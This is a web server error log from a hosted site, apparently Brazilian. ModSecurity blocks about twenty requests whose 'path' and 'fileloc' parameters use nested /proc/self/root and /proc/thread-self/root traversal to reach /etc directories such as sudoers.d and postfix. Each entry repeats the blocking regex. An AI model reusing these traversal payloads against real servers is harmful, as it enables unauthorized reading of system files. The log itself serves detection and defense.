https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:16.608965 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.241.46:51004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoJBXjF1vJNtV6CWrfVAAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:17.932680 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.241.46:51012] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoJRXjF1vJNtV6CWrfVQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:23:21.104162 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:45822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoKdSswJuvopo3lOhFNwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:23:21.199466 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.241.46:57708] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoKRXjF1vJNtV6CWrfWAAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:22.511142 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.241.46:57724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoKnbQATo66fKoS7wu0gAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:23.802977 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:57736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoK46lpbStxTqkSktR2AAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:26.167544 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:57752] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoLglT9VtDQc7bgUyMugAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:23:26.711440 2026] [:error] [pid 32654:tid 140411641214720] [client 74.7.243.203:34996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoLglT9VtDQc7bgUyMvAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:23:27.524917 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:57764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoL3jZBu2q05ozVU86JQAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:32.121353 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.241.46:53106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoNAlT9VtDQc7bgUyMxAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:23:41.643087 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:35002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoPbABkC4fWIHEf8HQ0gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:23:56.725326 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:55348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoTLABkC4fWIHEf8HQ4AAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:24:10.980872 2026] [:error] [pid 21946:tid 140411725141760] [client 74.7.241.46:53122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoWnbQATo66fKoS7wvCAAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:24:17.039464 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:52302] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoYXbQATo66fKoS7wvFQAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:24:18.350471 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:34420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoYglT9VtDQc7bgUyM5gAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:24:35.087550 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:34426] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfocxXjF1vJNtV6CWrfbQAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:24:36.401516 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:43526] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfodHjZBu2q05ozVU86KwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:24:37.790479 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.243.203:43542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfodY6lpbStxTqkSktR3gAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:24:53.466857 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:43550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfohbysWC90G-1nBrAqlwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:24:54.735473 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:32846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfohglT9VtDQc7bgUyNAwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:24:56.047373 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:32862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoiAlT9VtDQc7bgUyNBQAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:24:57.368308 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:32870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfoiY6lpbStxTqkSktR4gAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:25:10.189437 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.241.46:44778] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfolnbQATo66fKoS7wvSAAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
